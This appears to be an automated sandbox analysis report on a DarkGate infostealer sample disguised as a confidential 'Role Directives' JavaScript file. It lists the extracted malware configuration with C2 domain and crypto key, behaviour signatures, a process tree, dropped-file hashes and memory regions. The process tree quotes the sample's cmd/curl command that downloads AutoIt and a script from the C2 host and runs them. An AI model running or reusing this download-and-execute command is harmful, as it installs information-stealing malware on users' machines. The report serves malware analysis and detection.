Analysis

  • max time kernel
    165s
  • max time network
    173s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-10-2023 19:37

General

  • Target

    Role_Directives_Effective_2023_Confidential.js

  • Size

    51KB

  • MD5

    98a065c330d0e987786793a243f7f53e

  • SHA1

    277fc8a50892980c5523d1e1706d706d64e76624

  • SHA256

    54464835989986ae3804a570f5e3b299db8cb2a19a47d6444b1d410ad51586ee

  • SHA512

    ea07611e517669fc9dc3987d57598ccc33487035b1d22a346e40a6c06fcb8f38d1dd1f821bff8a478730ba73913ab518ad41301d13b61aee36fbe680e9943c23

  • SSDEEP

    768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3PywbIp9:nAIMFFdYMxAcEQDtk9

Score
10/10

Malware Config

Extracted

Family

darkgate

Botnet

Ricoc3

C2

http://hgfdytrywq.com

Attributes
  • alternative_c2_port

    8080

  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_rawstub

    true

  • crypto_key

    nZKkcsjzXrNNYH

  • internal_mutex

    txtMut

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    4

  • rootkit

    true

  • startup_persistence

    true

  • username

    Ricoc3

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\backgroundTaskHost.exe
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
    1⤵
      PID:3196
    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
      1⤵
        PID:4440
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
          PID:3848
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
            PID:3720
          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
            1⤵
              PID:3644
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              1⤵
                PID:3548
              • C:\Windows\system32\taskhostw.exe
                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                1⤵
                  PID:3016
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                  1⤵
                    PID:2840
                  • C:\Windows\system32\sihost.exe
                    sihost.exe
                    1⤵
                      PID:2796
                    • C:\Windows\system32\wscript.exe
                      wscript.exe C:\Users\Admin\AppData\Local\Temp\Role_Directives_Effective_2023_Confidential.js
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:2724
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o rfihfr.au3 http://hgfdytrywq.com:80/msihthowuna & Autoit3.exe rfihfr.au3
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2984
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:2744
                          • C:\Windows\system32\curl.exe
                            curl -o Autoit3.exe http://hgfdytrywq.com:80
                            3⤵
                              PID:2140
                            • C:\Windows\system32\curl.exe
                              curl -o rfihfr.au3 http://hgfdytrywq.com:80/msihthowuna
                              3⤵
                                PID:3092
                              • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
                                Autoit3.exe rfihfr.au3
                                3⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of WriteProcessMemory
                                PID:4460
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c ping 127.0.0.1
                                  4⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Blocklisted process makes network request
                                  • Drops startup file
                                  • Checks processor information in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  PID:2504

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\dfcegec\Autoit3.exe

                            Filesize

                            872KB

                            MD5

                            c56b5f0201a3b3de53e561fe76912bfd

                            SHA1

                            2a4062e10a5de813f5688221dbeb3f3ff33eb417

                            SHA256

                            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                            SHA512

                            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                          • C:\ProgramData\dfcegec\defhkca\ebakceb

                            Filesize

                            166B

                            MD5

                            56883b41580a23f3a667fef18f007703

                            SHA1

                            d1f40f16b31528031f61456e96c1fc09d4db2902

                            SHA256

                            afef80190e6b896294edf01442b7e61f6c81ed744ade378aee64fe33c0a14928

                            SHA512

                            2715c7df8c3aac0e767734d2234f73f796dde3da913145a94497a7483ac9ead1c7ee207519a46ccce2f7544bcadd46f29f80757f001122c5f168421a8d20912f

                          • C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

                            Filesize

                            872KB

                            MD5

                            c56b5f0201a3b3de53e561fe76912bfd

                            SHA1

                            2a4062e10a5de813f5688221dbeb3f3ff33eb417

                            SHA256

                            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                            SHA512

                            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                          • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

                            Filesize

                            872KB

                            MD5

                            c56b5f0201a3b3de53e561fe76912bfd

                            SHA1

                            2a4062e10a5de813f5688221dbeb3f3ff33eb417

                            SHA256

                            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                            SHA512

                            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                          • C:\Users\Admin\AppData\Local\Temp\rfihfr.au3

                            Filesize

                            488KB

                            MD5

                            35f52e907f6e1b5e69b1c2b09bb2c7ab

                            SHA1

                            e0515eb058df6d3163ebea48ebc115bfb73d3d82

                            SHA256

                            ed1f049cf36bd47bf980ffbd7a78ff7411978bc79b149d61f707789773dd4615

                            SHA512

                            35bbd35bfeda265dd22206dac68c3563f4444e80855450d7d264011de07e827bc5f1232630554cc1b64f6edfd23ae80c6d4b926d385056e05b38b49e23ec5135

                          • \??\c:\temp\eabfbfb.au3

                            Filesize

                            488KB

                            MD5

                            35f52e907f6e1b5e69b1c2b09bb2c7ab

                            SHA1

                            e0515eb058df6d3163ebea48ebc115bfb73d3d82

                            SHA256

                            ed1f049cf36bd47bf980ffbd7a78ff7411978bc79b149d61f707789773dd4615

                            SHA512

                            35bbd35bfeda265dd22206dac68c3563f4444e80855450d7d264011de07e827bc5f1232630554cc1b64f6edfd23ae80c6d4b926d385056e05b38b49e23ec5135

                          • memory/2504-54-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-51-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-92-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-90-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-91-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-58-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-89-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-88-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-24-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-23-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-29-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-30-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-31-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-60-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-38-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-37-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-39-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-43-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-42-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-44-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-46-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-47-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-48-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-49-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-50-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-59-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-52-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-53-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-19-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-55-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-56-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-57-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-87-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-21-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-86-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-61-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-63-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-64-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-65-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-66-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-67-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-68-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-69-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-70-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-71-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-72-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-73-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-74-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-75-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-76-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-77-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-81-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-80-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-82-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-83-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-84-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/2504-85-0x0000000000400000-0x0000000000466000-memory.dmp

                            Filesize

                            408KB

                          • memory/4460-8-0x00000000010D0000-0x00000000014D0000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/4460-17-0x0000000004380000-0x00000000046B2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/4460-20-0x00000000010D0000-0x00000000014D0000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/4460-18-0x0000000004380000-0x00000000046B2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/4460-16-0x0000000004380000-0x00000000046B2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/4460-15-0x0000000004380000-0x00000000046B2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/4460-9-0x0000000004380000-0x00000000046B2000-memory.dmp

                            Filesize

                            3.2MB

                          • memory/4460-22-0x0000000004380000-0x00000000046B2000-memory.dmp

                            Filesize

                            3.2MB